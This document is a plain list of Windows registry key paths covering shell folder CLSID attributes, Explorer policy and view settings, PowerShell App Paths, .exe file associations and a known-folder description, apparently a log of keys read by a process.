HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BD7A2E7B-21CB-41b2-A086-B309680C6B7E}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BD7A2E7B-21CB-41b2-A086-B309680C6B7E}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BD7A2E7B-21CB-41b2-A086-B309680C6B7E}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BD7A2E7B-21CB-41b2-A086-B309680C6B7E}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BD7A2E7B-21CB-41b2-A086-B309680C6B7E}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BD7A2E7B-21CB-41b2-A086-B309680C6B7E}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BD7A2E7B-21CB-41b2-A086-B309680C6B7E}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BD7A2E7B-21CB-41b2-A086-B309680C6B7E}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BD7A2E7B-21CB-41b2-A086-B309680C6B7E}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BD7A2E7B-21CB-41b2-A086-B309680C6B7E}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BD7A2E7B-21CB-41b2-A086-B309680C6B7E}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BD7A2E7B-21CB-41b2-A086-B309680C6B7E}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BD7A2E7B-21CB-41b2-A086-B309680C6B7E}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BD7A2E7B-21CB-41b2-A086-B309680C6B7E}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BD7A2E7B-21CB-41b2-A086-B309680C6B7E}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BD7A2E7B-21CB-41b2-A086-B309680C6B7E}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BD7A2E7B-21CB-41b2-A086-B309680C6B7E}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}
HKEY_CLASSES_ROOT\CLSID\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\ShellFolder
HKEY_CURRENT_USER\Software\Classes\CLSID\{daf95313-e44d-46af-be1b-cbacea2c3065}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{daf95313-e44d-46af-be1b-cbacea2c3065}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{daf95313-e44d-46af-be1b-cbacea2c3065}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{daf95313-e44d-46af-be1b-cbacea2c3065}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{daf95313-e44d-46af-be1b-cbacea2c3065}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{daf95313-e44d-46af-be1b-cbacea2c3065}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{daf95313-e44d-46af-be1b-cbacea2c3065}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{daf95313-e44d-46af-be1b-cbacea2c3065}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{daf95313-e44d-46af-be1b-cbacea2c3065}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{daf95313-e44d-46af-be1b-cbacea2c3065}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{daf95313-e44d-46af-be1b-cbacea2c3065}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{daf95313-e44d-46af-be1b-cbacea2c3065}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{daf95313-e44d-46af-be1b-cbacea2c3065}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{daf95313-e44d-46af-be1b-cbacea2c3065}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{daf95313-e44d-46af-be1b-cbacea2c3065}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{daf95313-e44d-46af-be1b-cbacea2c3065}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{daf95313-e44d-46af-be1b-cbacea2c3065}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{daf95313-e44d-46af-be1b-cbacea2c3065}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{daf95313-e44d-46af-be1b-cbacea2c3065}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}
HKEY_CLASSES_ROOT\CLSID\{E345F35F-9397-435C-8F95-4E922C26259E}\ShellFolder
HKEY_CURRENT_USER\Software\Classes\CLSID\{e345f35f-9397-435c-8f95-4e922c26259e}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{e345f35f-9397-435c-8f95-4e922c26259e}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{e345f35f-9397-435c-8f95-4e922c26259e}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{e345f35f-9397-435c-8f95-4e922c26259e}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{e345f35f-9397-435c-8f95-4e922c26259e}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{e345f35f-9397-435c-8f95-4e922c26259e}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{e345f35f-9397-435c-8f95-4e922c26259e}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{e345f35f-9397-435c-8f95-4e922c26259e}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{e345f35f-9397-435c-8f95-4e922c26259e}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{e345f35f-9397-435c-8f95-4e922c26259e}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{e345f35f-9397-435c-8f95-4e922c26259e}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{e345f35f-9397-435c-8f95-4e922c26259e}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{e345f35f-9397-435c-8f95-4e922c26259e}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{e345f35f-9397-435c-8f95-4e922c26259e}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{e345f35f-9397-435c-8f95-4e922c26259e}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{e345f35f-9397-435c-8f95-4e922c26259e}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{e345f35f-9397-435c-8f95-4e922c26259e}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{e345f35f-9397-435c-8f95-4e922c26259e}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{e345f35f-9397-435c-8f95-4e922c26259e}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{E345F35F-9397-435C-8F95-4E922C26259E}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{E345F35F-9397-435C-8F95-4E922C26259E}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{E345F35F-9397-435C-8F95-4E922C26259E}
HKEY_CLASSES_ROOT\CLSID\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\ShellFolder
HKEY_CURRENT_USER\Software\Classes\CLSID\{ED228FDF-9EA8-4870-83b1-96b02CFE0D52}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ED228FDF-9EA8-4870-83b1-96b02CFE0D52}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ED228FDF-9EA8-4870-83b1-96b02CFE0D52}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ED228FDF-9EA8-4870-83b1-96b02CFE0D52}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ED228FDF-9EA8-4870-83b1-96b02CFE0D52}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ED228FDF-9EA8-4870-83b1-96b02CFE0D52}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ED228FDF-9EA8-4870-83b1-96b02CFE0D52}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ED228FDF-9EA8-4870-83b1-96b02CFE0D52}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ED228FDF-9EA8-4870-83b1-96b02CFE0D52}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ED228FDF-9EA8-4870-83b1-96b02CFE0D52}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ED228FDF-9EA8-4870-83b1-96b02CFE0D52}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ED228FDF-9EA8-4870-83b1-96b02CFE0D52}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ED228FDF-9EA8-4870-83b1-96b02CFE0D52}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ED228FDF-9EA8-4870-83b1-96b02CFE0D52}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ED228FDF-9EA8-4870-83b1-96b02CFE0D52}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ED228FDF-9EA8-4870-83b1-96b02CFE0D52}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ED228FDF-9EA8-4870-83b1-96b02CFE0D52}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ED228FDF-9EA8-4870-83b1-96b02CFE0D52}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ED228FDF-9EA8-4870-83b1-96b02CFE0D52}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}
HKEY_CLASSES_ROOT\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder
HKEY_CURRENT_USER\Software\Classes\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}
HKEY_CLASSES_ROOT\CLSID\{F3F5824C-AD58-4728-AF59-A1EBE3392799}\ShellFolder
HKEY_CURRENT_USER\Software\Classes\CLSID\{F3F5824C-AD58-4728-AF59-A1EBE3392799}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F3F5824C-AD58-4728-AF59-A1EBE3392799}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F3F5824C-AD58-4728-AF59-A1EBE3392799}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F3F5824C-AD58-4728-AF59-A1EBE3392799}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F3F5824C-AD58-4728-AF59-A1EBE3392799}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F3F5824C-AD58-4728-AF59-A1EBE3392799}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F3F5824C-AD58-4728-AF59-A1EBE3392799}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F3F5824C-AD58-4728-AF59-A1EBE3392799}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F3F5824C-AD58-4728-AF59-A1EBE3392799}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F3F5824C-AD58-4728-AF59-A1EBE3392799}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F3F5824C-AD58-4728-AF59-A1EBE3392799}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F3F5824C-AD58-4728-AF59-A1EBE3392799}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F3F5824C-AD58-4728-AF59-A1EBE3392799}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F3F5824C-AD58-4728-AF59-A1EBE3392799}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F3F5824C-AD58-4728-AF59-A1EBE3392799}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F3F5824C-AD58-4728-AF59-A1EBE3392799}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F3F5824C-AD58-4728-AF59-A1EBE3392799}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F3F5824C-AD58-4728-AF59-A1EBE3392799}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F3F5824C-AD58-4728-AF59-A1EBE3392799}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{F3F5824C-AD58-4728-AF59-A1EBE3392799}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{F3F5824C-AD58-4728-AF59-A1EBE3392799}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{F3F5824C-AD58-4728-AF59-A1EBE3392799}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\powershell.exe
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\powershell.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\PowerShell.exe\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5571c645-6060-11ed-bf52-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5571c645-6060-11ed-bf52-806e6f6e6963}\Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DontShowSuperHidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellState
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWebView
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\ClassicShell
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\SeparateProcess
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoNetCrawling
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSimpleStartMenu
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowCompColor
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\DontPrettyPath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowInfoTip
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideIcons
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\MapNetDrvBtn
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\WebView
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Filter
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SeparateProcess
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\NoNetCrawling
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\AutoCheckSelect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\IconsOnly
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowTypeOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\ShellEx\IconHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\ShellEx\IconHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\Clsid
HKEY_CURRENT_USER\Software\Classes\Directory\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\IsShortcut
HKEY_CURRENT_USER\Software\Classes\Directory\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\AlwaysShowExt
HKEY_CURRENT_USER\Software\Classes\Directory\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\NeverShowExt
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\AllowFileCLSIDJunctions
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.exe\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts
HKEY_CLASSES_ROOT\SystemFileAssociations\.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.exe\Content Type
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\PreCreate
